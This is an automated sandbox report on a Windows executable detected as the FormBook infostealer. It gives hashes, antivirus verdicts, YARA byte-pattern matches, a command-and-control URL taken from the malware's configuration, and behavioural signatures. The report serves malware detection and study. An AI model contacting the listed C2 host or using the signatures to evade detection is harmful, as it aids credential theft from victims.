Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nSMFpXgLe7.exe

Overview

General Information

Sample Name:nSMFpXgLe7.exe
Original Sample Name:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48.exe
Analysis ID:830331
MD5:80b40bd25a0ad14166dbbe17215b678a
SHA1:94f9b752785949d23585e66b497a8c446ab81ec0
SHA256:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48
Tags:exeFormbook
Infos:

Detection

FormBook
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Yara signature match
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • nSMFpXgLe7.exe (PID: 4968 cmdline: C:\Users\user\Desktop\nSMFpXgLe7.exe MD5: 80B40BD25A0AD14166DBBE17215B678A)
    • WerFault.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"C2 list": ["www.carolinerosenstein.com/g44n/"]}
SourceRuleDescriptionAuthorStrings
nSMFpXgLe7.exeJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    nSMFpXgLe7.exeJoeSecurity_FormBookYara detected FormBookJoe Security
      nSMFpXgLe7.exeWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x7148:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1fba7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xb3f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1892e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      nSMFpXgLe7.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x1872c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x181d8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1882e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x189a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xafc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x17423:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1e91e:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1f911:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      nSMFpXgLe7.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x1ac20:$sqlite3step: 68 34 1C 7B E1
      • 0x1b798:$sqlite3step: 68 34 1C 7B E1
      • 0x1ac62:$sqlite3text: 68 38 2A 90 C5
      • 0x1b7dd:$sqlite3text: 68 38 2A 90 C5
      • 0x1ac79:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1b7f3:$sqlite3blob: 68 53 D8 7F 8C
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6d48:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1f7a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xaff6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1852e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x1832c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x17dd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x1842e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x185a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xabc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x17023:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1e51e:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1f511:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x1a820:$sqlite3step: 68 34 1C 7B E1
          • 0x1b398:$sqlite3step: 68 34 1C 7B E1
          • 0x1a862:$sqlite3text: 68 38 2A 90 C5
          • 0x1b3dd:$sqlite3text: 68 38 2A 90 C5
          • 0x1a879:$sqlite3blob: 68 53 D8 7F 8C
          • 0x1b3f3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 6 entries
          SourceRuleDescriptionAuthorStrings
          0.0.nSMFpXgLe7.exe.1140000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            0.0.nSMFpXgLe7.exe.1140000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              0.0.nSMFpXgLe7.exe.1140000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1f9a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0xb1f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x1872e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              0.0.nSMFpXgLe7.exe.1140000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x1852c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x17fd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x1862e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x187a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0xadc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x17223:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0x1e71e:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1f711:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              0.0.nSMFpXgLe7.exe.1140000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x1aa20:$sqlite3step: 68 34 1C 7B E1
              • 0x1b598:$sqlite3step: 68 34 1C 7B E1
              • 0x1aa62:$sqlite3text: 68 38 2A 90 C5
              • 0x1b5dd:$sqlite3text: 68 38 2A 90 C5
              • 0x1aa79:$sqlite3blob: 68 53 D8 7F 8C
              • 0x1b5f3:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 5 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: nSMFpXgLe7.exeAvira: detected
              Source: nSMFpXgLe7.exeReversingLabs: Detection: 71%
              Source: nSMFpXgLe7.exeVirustotal: Detection: 66%Perma Link
              Source: Yara matchFile source: nSMFpXgLe7.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: www.carolinerosenstein.com/g44n/Avira URL Cloud: Label: malware
              Source: nSMFpXgLe7.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.carolinerosenstein.com/g44n/"]}
              Source: nSMFpXgLe7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: nSMFpXgLe7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Malware configuration extractorURLs: www.carolinerosenstein.com/g44n/
              Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: nSMFpXgLe7.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

              System Summary

              barindex
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: nSMFpXgLe7.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: nSMFpXgLe7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: nSMFpXgLe7.exeStatic PE information: No import functions for PE file found
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: nSMFpXgLe7.exe, type: SAMPLEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: nSMFpXgLe7.exe PID: 4968, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011412B00_2_011412B0
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0116236A0_2_0116236A
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011615060_2_01161506
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_01161D390_2_01161D39
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0114B4570_2_0114B457
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0114B4520_2_0114B452
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011444C70_2_011444C7
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011444C00_2_011444C0
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0114FE870_2_0114FE87
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011446E70_2_011446E7
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011412B0 EntryPoint,LdrInitializeThunk,NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011412B0
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011414E9 NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011414E9
              Source: nSMFpXgLe7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: nSMFpXgLe7.exeStatic PE information: Section .text
              Source: nSMFpXgLe7.exeReversingLabs: Detection: 71%
              Source: nSMFpXgLe7.exeVirustotal: Detection: 66%
              Source: nSMFpXgLe7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\nSMFpXgLe7.exe C:\Users\user\Desktop\nSMFpXgLe7.exe
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4968
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB1.tmpJump to behavior
              Source: classification engineClassification label: mal96.troj.winEXE@2/6@0/0
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: nSMFpXgLe7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_01161153 push eax; ret 0_2_01161159
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0114E9FC push es; retf 0_2_0114EA09
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0116109C push eax; ret 0_2_011610EF
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011610F2 push eax; ret 0_2_01161159
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011610E9 push eax; ret 0_2_011610EF
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0115A37A push esi; retf 0_2_0115A37C
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_01149BCE pushad ; iretd 0_2_01149BCF
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0115AA73 push es; iretd 0_2_0115AA75
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_01161442 push dword ptr [482F20F0h]; ret 0_2_0116148C
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_0115ACFE push cs; iretd 0_2_0115ACFF
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011627A5 push esp; ret 0_2_011627A9
              Source: initial sampleStatic PE information: section name: .text entropy: 7.324967441383678
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: Amcache.hve.3.drBinary or memory string: VMware
              Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: Amcache.hve.3.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.3.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.3.drBinary or memory string: VMware7,1
              Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.me
              Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\nSMFpXgLe7.exeCode function: 0_2_011412B0 EntryPoint,LdrInitializeThunk,NtProtectVirtualMemory,KiUserExceptionDispatcher,0_2_011412B0
              Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: nSMFpXgLe7.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: nSMFpXgLe7.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nSMFpXgLe7.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
